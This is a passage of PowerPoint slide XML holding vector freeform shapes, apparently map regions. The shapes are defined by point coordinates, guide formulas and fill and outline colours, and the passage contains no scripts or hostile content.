                      <a:pt x="148" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="172"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36441" name="Freeform 173"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3131" y="2417"/>
                <a:ext cx="192" cy="171"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 151 w 192"/>
                  <a:gd name="T1" fmla="*/ 8 h 171"/>
                  <a:gd name="T2" fmla="*/ 162 w 192"/>
                  <a:gd name="T3" fmla="*/ 39 h 171"/>
                  <a:gd name="T4" fmla="*/ 156 w 192"/>
                  <a:gd name="T5" fmla="*/ 51 h 171"/>
                  <a:gd name="T6" fmla="*/ 153 w 192"/>
                  <a:gd name="T7" fmla="*/ 67 h 171"/>
                  <a:gd name="T8" fmla="*/ 149 w 192"/>
                  <a:gd name="T9" fmla="*/ 68 h 171"/>
                  <a:gd name="T10" fmla="*/ 140 w 192"/>
                  <a:gd name="T11" fmla="*/ 58 h 171"/>
                  <a:gd name="T12" fmla="*/ 135 w 192"/>
                  <a:gd name="T13" fmla="*/ 46 h 171"/>
                  <a:gd name="T14" fmla="*/ 129 w 192"/>
                  <a:gd name="T15" fmla="*/ 38 h 171"/>
                  <a:gd name="T16" fmla="*/ 126 w 192"/>
                  <a:gd name="T17" fmla="*/ 31 h 171"/>
                  <a:gd name="T18" fmla="*/ 121 w 192"/>
                  <a:gd name="T19" fmla="*/ 37 h 171"/>
                  <a:gd name="T20" fmla="*/ 126 w 192"/>
                  <a:gd name="T21" fmla="*/ 51 h 171"/>
                  <a:gd name="T22" fmla="*/ 137 w 192"/>
                  <a:gd name="T23" fmla="*/ 66 h 171"/>
                  <a:gd name="T24" fmla="*/ 145 w 192"/>
                  <a:gd name="T25" fmla="*/ 83 h 171"/>
                  <a:gd name="T26" fmla="*/ 149 w 192"/>
                  <a:gd name="T27" fmla="*/ 94 h 171"/>
                  <a:gd name="T28" fmla="*/ 163 w 192"/>
                  <a:gd name="T29" fmla="*/ 122 h 171"/>
                  <a:gd name="T30" fmla="*/ 171 w 192"/>
                  <a:gd name="T31" fmla="*/ 132 h 171"/>
                  <a:gd name="T32" fmla="*/ 175 w 192"/>
                  <a:gd name="T33" fmla="*/ 136 h 171"/>
                  <a:gd name="T34" fmla="*/ 171 w 192"/>
                  <a:gd name="T35" fmla="*/ 138 h 171"/>
                  <a:gd name="T36" fmla="*/ 173 w 192"/>
                  <a:gd name="T37" fmla="*/ 148 h 171"/>
                  <a:gd name="T38" fmla="*/ 175 w 192"/>
                  <a:gd name="T39" fmla="*/ 154 h 171"/>
                  <a:gd name="T40" fmla="*/ 184 w 192"/>
                  <a:gd name="T41" fmla="*/ 159 h 171"/>
                  <a:gd name="T42" fmla="*/ 190 w 192"/>
                  <a:gd name="T43" fmla="*/ 166 h 171"/>
                  <a:gd name="T44" fmla="*/ 118 w 192"/>
                  <a:gd name="T45" fmla="*/ 171 h 171"/>
                  <a:gd name="T46" fmla="*/ 83 w 192"/>
                  <a:gd name="T47" fmla="*/ 171 h 171"/>
                  <a:gd name="T48" fmla="*/ 49 w 192"/>
                  <a:gd name="T49" fmla="*/ 171 h 171"/>
                  <a:gd name="T50" fmla="*/ 28 w 192"/>
                  <a:gd name="T51" fmla="*/ 171 h 171"/>
                  <a:gd name="T52" fmla="*/ 10 w 192"/>
                  <a:gd name="T53" fmla="*/ 171 h 171"/>
                  <a:gd name="T54" fmla="*/ 4 w 192"/>
                  <a:gd name="T55" fmla="*/ 151 h 171"/>
                  <a:gd name="T56" fmla="*/ 4 w 192"/>
                  <a:gd name="T57" fmla="*/ 119 h 171"/>
                  <a:gd name="T58" fmla="*/ 4 w 192"/>
                  <a:gd name="T59" fmla="*/ 97 h 171"/>
                  <a:gd name="T60" fmla="*/ 4 w 192"/>
                  <a:gd name="T61" fmla="*/ 54 h 171"/>
                  <a:gd name="T62" fmla="*/ 4 w 192"/>
                  <a:gd name="T63" fmla="*/ 43 h 171"/>
                  <a:gd name="T64" fmla="*/ 0 w 192"/>
                  <a:gd name="T65" fmla="*/ 28 h 171"/>
                  <a:gd name="T66" fmla="*/ 3 w 192"/>
                  <a:gd name="T67" fmla="*/ 21 h 171"/>
                  <a:gd name="T68" fmla="*/ 2 w 192"/>
                  <a:gd name="T69" fmla="*/ 7 h 171"/>
                  <a:gd name="T70" fmla="*/ 6 w 192"/>
                  <a:gd name="T71" fmla="*/ 2 h 171"/>
                  <a:gd name="T72" fmla="*/ 9 w 192"/>
                  <a:gd name="T73" fmla="*/ 2 h 171"/>
                  <a:gd name="T74" fmla="*/ 17 w 192"/>
                  <a:gd name="T75" fmla="*/ 1 h 171"/>
                  <a:gd name="T76" fmla="*/ 34 w 192"/>
                  <a:gd name="T77" fmla="*/ 3 h 171"/>
                  <a:gd name="T78" fmla="*/ 43 w 192"/>
                  <a:gd name="T79" fmla="*/ 5 h 171"/>
                  <a:gd name="T80" fmla="*/ 51 w 192"/>
                  <a:gd name="T81" fmla="*/ 10 h 171"/>
                  <a:gd name="T82" fmla="*/ 60 w 192"/>
                  <a:gd name="T83" fmla="*/ 10 h 171"/>
                  <a:gd name="T84" fmla="*/ 72 w 192"/>
                  <a:gd name="T85" fmla="*/ 14 h 171"/>
                  <a:gd name="T86" fmla="*/ 79 w 192"/>
                  <a:gd name="T87" fmla="*/ 9 h 171"/>
                  <a:gd name="T88" fmla="*/ 91 w 192"/>
                  <a:gd name="T89" fmla="*/ 4 h 171"/>
                  <a:gd name="T90" fmla="*/ 100 w 192"/>
                  <a:gd name="T91" fmla="*/ 1 h 171"/>
                  <a:gd name="T92" fmla="*/ 106 w 192"/>
                  <a:gd name="T93" fmla="*/ 2 h 171"/>
                  <a:gd name="T94" fmla="*/ 113 w 192"/>
                  <a:gd name="T95" fmla="*/ 6 h 171"/>
                  <a:gd name="T96" fmla="*/ 121 w 192"/>
                  <a:gd name="T97" fmla="*/ 8 h 171"/>
                  <a:gd name="T98" fmla="*/ 128 w 192"/>
                  <a:gd name="T99" fmla="*/ 11 h 171"/>
                  <a:gd name="T100" fmla="*/ 134 w 192"/>
                  <a:gd name="T101" fmla="*/ 9 h 171"/>
                  <a:gd name="T102" fmla="*/ 141 w 192"/>
                  <a:gd name="T103" fmla="*/ 10 h 171"/>
                  <a:gd name="T104" fmla="*/ 146 w 192"/>
                  <a:gd name="T105" fmla="*/ 8 h 171"/>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92"/>
                  <a:gd name="T160" fmla="*/ 0 h 171"/>
                  <a:gd name="T161" fmla="*/ 192 w 192"/>
                  <a:gd name="T162" fmla="*/ 171 h 171"/>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92" h="171">
                    <a:moveTo>
                      <a:pt x="150" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="151" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36442" name="Freeform 174"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3131" y="2417"/>
                <a:ext cx="192" cy="171"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 151 w 192"/>
                  <a:gd name="T1" fmla="*/ 8 h 171"/>
                  <a:gd name="T2" fmla="*/ 162 w 192"/>
                  <a:gd name="T3" fmla="*/ 39 h 171"/>
                  <a:gd name="T4" fmla="*/ 156 w 192"/>
                  <a:gd name="T5" fmla="*/ 51 h 171"/>
                  <a:gd name="T6" fmla="*/ 153 w 192"/>
                  <a:gd name="T7" fmla="*/ 67 h 171"/>
                  <a:gd name="T8" fmla="*/ 149 w 192"/>
                  <a:gd name="T9" fmla="*/ 68 h 171"/>
                  <a:gd name="T10" fmla="*/ 140 w 192"/>
                  <a:gd name="T11" fmla="*/ 58 h 171"/>
                  <a:gd name="T12" fmla="*/ 135 w 192"/>
                  <a:gd name="T13" fmla="*/ 46 h 171"/>
                  <a:gd name="T14" fmla="*/ 129 w 192"/>
                  <a:gd name="T15" fmla="*/ 38 h 171"/>
                  <a:gd name="T16" fmla="*/ 126 w 192"/>
                  <a:gd name="T17" fmla="*/ 31 h 171"/>
                  <a:gd name="T18" fmla="*/ 121 w 192"/>
                  <a:gd name="T19" fmla="*/ 37 h 171"/>
                  <a:gd name="T20" fmla="*/ 126 w 192"/>
                  <a:gd name="T21" fmla="*/ 51 h 171"/>
                  <a:gd name="T22" fmla="*/ 137 w 192"/>
                  <a:gd name="T23" fmla="*/ 66 h 171"/>
                  <a:gd name="T24" fmla="*/ 145 w 192"/>
                  <a:gd name="T25" fmla="*/ 83 h 171"/>
                  <a:gd name="T26" fmla="*/ 149 w 192"/>
                  <a:gd name="T27" fmla="*/ 94 h 171"/>
                  <a:gd name="T28" fmla="*/ 163 w 192"/>
                  <a:gd name="T29" fmla="*/ 122 h 171"/>
                  <a:gd name="T30" fmla="*/ 171 w 192"/>
                  <a:gd name="T31" fmla="*/ 132 h 171"/>
                  <a:gd name="T32" fmla="*/ 175 w 192"/>
                  <a:gd name="T33" fmla="*/ 136 h 171"/>
                  <a:gd name="T34" fmla="*/ 171 w 192"/>
                  <a:gd name="T35" fmla="*/ 138 h 171"/>
                  <a:gd name="T36" fmla="*/ 173 w 192"/>
                  <a:gd name="T37" fmla="*/ 148 h 171"/>
                  <a:gd name="T38" fmla="*/ 175 w 192"/>
                  <a:gd name="T39" fmla="*/ 154 h 171"/>
                  <a:gd name="T40" fmla="*/ 184 w 192"/>
                  <a:gd name="T41" fmla="*/ 159 h 171"/>
                  <a:gd name="T42" fmla="*/ 190 w 192"/>
                  <a:gd name="T43" fmla="*/ 166 h 171"/>
                  <a:gd name="T44" fmla="*/ 118 w 192"/>
                  <a:gd name="T45" fmla="*/ 171 h 171"/>
                  <a:gd name="T46" fmla="*/ 83 w 192"/>
                  <a:gd name="T47" fmla="*/ 171 h 171"/>
                  <a:gd name="T48" fmla="*/ 49 w 192"/>
                  <a:gd name="T49" fmla="*/ 171 h 171"/>
                  <a:gd name="T50" fmla="*/ 28 w 192"/>
                  <a:gd name="T51" fmla="*/ 171 h 171"/>
                  <a:gd name="T52" fmla="*/ 10 w 192"/>
                  <a:gd name="T53" fmla="*/ 171 h 171"/>
                  <a:gd name="T54" fmla="*/ 4 w 192"/>
                  <a:gd name="T55" fmla="*/ 151 h 171"/>
                  <a:gd name="T56" fmla="*/ 4 w 192"/>
                  <a:gd name="T57" fmla="*/ 119 h 171"/>
                  <a:gd name="T58" fmla="*/ 4 w 192"/>
                  <a:gd name="T59" fmla="*/ 97 h 171"/>
                  <a:gd name="T60" fmla="*/ 4 w 192"/>
                  <a:gd name="T61" fmla="*/ 54 h 171"/>
                  <a:gd name="T62" fmla="*/ 4 w 192"/>
                  <a:gd name="T63" fmla="*/ 43 h 171"/>
                  <a:gd name="T64" fmla="*/ 0 w 192"/>
                  <a:gd name="T65" fmla="*/ 28 h 171"/>
                  <a:gd name="T66" fmla="*/ 3 w 192"/>
                  <a:gd name="T67" fmla="*/ 21 h 171"/>
                  <a:gd name="T68" fmla="*/ 2 w 192"/>
                  <a:gd name="T69" fmla="*/ 7 h 171"/>
                  <a:gd name="T70" fmla="*/ 6 w 192"/>
                  <a:gd name="T71" fmla="*/ 2 h 171"/>
                  <a:gd name="T72" fmla="*/ 9 w 192"/>
                  <a:gd name="T73" fmla="*/ 2 h 171"/>
                  <a:gd name="T74" fmla="*/ 17 w 192"/>
                  <a:gd name="T75" fmla="*/ 1 h 171"/>
                  <a:gd name="T76" fmla="*/ 34 w 192"/>
                  <a:gd name="T77" fmla="*/ 3 h 171"/>
                  <a:gd name="T78" fmla="*/ 43 w 192"/>
                  <a:gd name="T79" fmla="*/ 5 h 171"/>
                  <a:gd name="T80" fmla="*/ 51 w 192"/>
                  <a:gd name="T81" fmla="*/ 10 h 171"/>
                  <a:gd name="T82" fmla="*/ 60 w 192"/>
                  <a:gd name="T83" fmla="*/ 10 h 171"/>
                  <a:gd name="T84" fmla="*/ 72 w 192"/>
                  <a:gd name="T85" fmla="*/ 14 h 171"/>
                  <a:gd name="T86" fmla="*/ 79 w 192"/>
                  <a:gd name="T87" fmla="*/ 9 h 171"/>
                  <a:gd name="T88" fmla="*/ 91 w 192"/>
                  <a:gd name="T89" fmla="*/ 4 h 171"/>
                  <a:gd name="T90" fmla="*/ 100 w 192"/>
                  <a:gd name="T91" fmla="*/ 1 h 171"/>
                  <a:gd name="T92" fmla="*/ 106 w 192"/>
                  <a:gd name="T93" fmla="*/ 2 h 171"/>
                  <a:gd name="T94" fmla="*/ 113 w 192"/>
                  <a:gd name="T95" fmla="*/ 6 h 171"/>
                  <a:gd name="T96" fmla="*/ 121 w 192"/>
                  <a:gd name="T97" fmla="*/ 8 h 171"/>
                  <a:gd name="T98" fmla="*/ 128 w 192"/>
                  <a:gd name="T99" fmla="*/ 11 h 171"/>
                  <a:gd name="T100" fmla="*/ 134 w 192"/>
                  <a:gd name="T101" fmla="*/ 9 h 171"/>
                  <a:gd name="T102" fmla="*/ 141 w 192"/>
                  <a:gd name="T103" fmla="*/ 10 h 171"/>
                  <a:gd name="T104" fmla="*/ 146 w 192"/>
                  <a:gd name="T105" fmla="*/ 8 h 171"/>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92"/>
                  <a:gd name="T160" fmla="*/ 0 h 171"/>
                  <a:gd name="T161" fmla="*/ 192 w 192"/>
                  <a:gd name="T162" fmla="*/ 171 h 171"/>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92" h="171">
                    <a:moveTo>
                      <a:pt x="150" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="151" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
